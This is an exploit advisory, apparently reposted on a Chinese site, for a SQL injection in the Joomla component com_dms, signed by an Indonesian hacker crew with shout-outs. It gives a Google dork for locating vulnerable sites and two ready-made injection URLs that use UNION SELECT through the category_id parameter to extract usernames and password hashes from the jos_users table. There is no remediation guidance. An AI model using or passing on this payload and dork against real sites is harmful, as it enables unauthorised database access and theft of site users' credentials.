Joomla Component com_dms SQL Injection Vulnerability
2010-02-09 10:16:07 作者:root 来源: 浏览次数:0
网友评论 条
/**************************************************************************
[~] Joomla Component com_dms
/************************************************************************** |
[~] Joomla Component com_dms Remote SQL injection vulnerability - (category_id) |
[~] Author : kaMtiEz (kamzcrew@yahoo.com) |
[~] Homepage : http://www.indonesiancoder.com |
[~] Date : 28 January, 2010 |
**************************************************************************/ |
[+] Vendor : http://joomdonation.com/ |
[+] Info : http://joomdonation.com/index.php?option=com_content&view=article&id=41&Itemid=40 |
[+] version : 2.5.1 or lower maybe also affected |
[+] Vulnerability : SQL injection |
[+] Dork : inurl:"com_dms" |
=========================================================================== |
http://server/index.php?option=com_dms&task=view_category&category_id=[INDONESIANCODER] |
-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users-- |
http://server/index.php?option=com_dms&task=view_category&category_id=-666+union+all+select+666,666,666,666,666,666,666,concat_ws(0x3a,username,password),666,666,666,666,666,666,666,666,666,666,666,666,666+from+jos_users-- |
=========================================================================== |
[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah |
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack |
[+] Contrex,onthel,yasea,bugs,Ronz,Pathloader,cimpli,MarahMerah |
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue a.k.a mbamboenk |
[+] Babe enyak adek i love u pull dah .. |
[+] Bercinta Sekuat Tenaga ! |
[+] we are not dead INDONESIANCODER stil r0x |
[收藏]
[打印] [关闭]
[返回顶部]
已有